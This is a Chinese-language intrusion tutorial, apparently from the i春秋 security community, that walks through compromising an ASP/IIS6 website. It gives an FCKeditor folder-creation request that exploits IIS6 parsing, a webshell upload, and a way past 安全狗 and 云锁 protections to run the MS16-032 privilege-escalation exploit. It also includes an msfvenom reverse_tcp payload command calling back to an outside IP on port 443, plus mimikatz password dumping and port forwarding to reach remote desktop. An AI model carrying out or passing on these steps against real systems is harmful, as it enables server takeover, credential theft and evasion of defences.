本文作者：i春秋簽約作家——酷帥王子

一、 利用getwebshell篇

首先對目標站進行掃描，發現是asp的，直接掃出網站後臺和默認數據庫，下載解密登陸如圖：

下面進後臺發現有fckeditor，而且還是iis6.0的，可以考慮創建個asp目錄來構造解析（fck編輯器路徑被改成別的需要burpsuite抓包的時候看到）

下面我們構造一個asp目錄，如：

http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975

然後再給shell.asp目錄上傳一個jpg圖片格式的一句話，然後用hatchet打開，然後看了一下支持aspx，那麽我們就用包含的辦法先把aspx後綴名改成.rar，然後再創建個111.ASPx，裏面包含rar文件，進去以後看進程有雲鎖和安全狗，那麽，那麽我們慢慢來，慢慢來。

一、 繞過安全狗雲鎖提權並且加賬號

沒法看系統信息，但是根據網站404頁面可以斷定是2003服務器，然後接著訪問C:\Program Files (x86)存在斷定是2003 64位系統，那麽我們說幹就幹，我們上傳ms16-032 64位直接幹，但是發現上傳exe或者別的格式exp會自動消失，看進程也沒殺毒呀，沒錯沒殺毒，是雲鎖有個功能防禦了，那麽突破雲鎖上傳的方法就是利用rar，先把exp打包為64.rar上傳，然後我們翻一下rar在哪個目錄，在C:\Program Files (x86)，然後開幹

如圖：

然後執行直接是system權限,然後我用幹狗神器給加了一個賬號用tunna反彈3968提示不是遠程組，我操後來也想著用getpassword64抓明文密碼，但是一執行就卡死，沒辦法想到了metasploit

一、 利用metasploit

首先用pentestbox生成一個64位的payload如下命令

msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe

為什麽要用443端口，之前我測試用別的端口直接被墻了沒法上線，下面我們在system下執行這個mata，上線如圖：

下面我們用這個命令抓一下明文密碼命令1：use mimikatz 命令2：kerberos如下圖：

下面我們來做一個監聽如下命令：

portfwd add -l 6655 -p 3968 -r 127.0.0.1，這個命令的意思就是把目標服務器的遠程3968轉發到pentestbox的公網IP的6655端口如圖：

老鐵沒毛病，謝謝你觀看我的教程，謝謝非常感謝~

從getwebshell到繞過安全狗雲鎖提權再到利用matasploit進服務器